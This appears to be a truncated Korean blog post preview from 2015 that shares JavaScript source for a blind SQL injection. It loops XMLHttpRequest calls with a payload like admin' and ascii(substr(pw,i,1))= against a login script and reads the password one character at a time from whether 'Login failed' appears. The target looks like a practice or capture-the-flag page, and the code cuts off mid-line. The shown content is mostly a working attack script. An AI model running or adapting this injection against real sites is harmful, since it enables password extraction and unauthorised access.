XMLHttpRequest blind sql injection1 XMLHttpRequest 를 이용한 Blind SQL Injection 소스 [GET]flag = ""function run(i,j){var req = new XMLHttpRequest();req.open('GET', '/pytest/get_ok.php?id=admin\' and ascii(substr(pw,'+i+',1))='+j+'%23&pw=1');req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');req.send();req.onreadystatechange = function() {if(req.readyState == 4 && req.status == 200){if(req.responseText.indexOf("Login failed") == -1){ // 해당문자열이 없을 시flag += S.. 2015. 3. 27. 이전 1 다음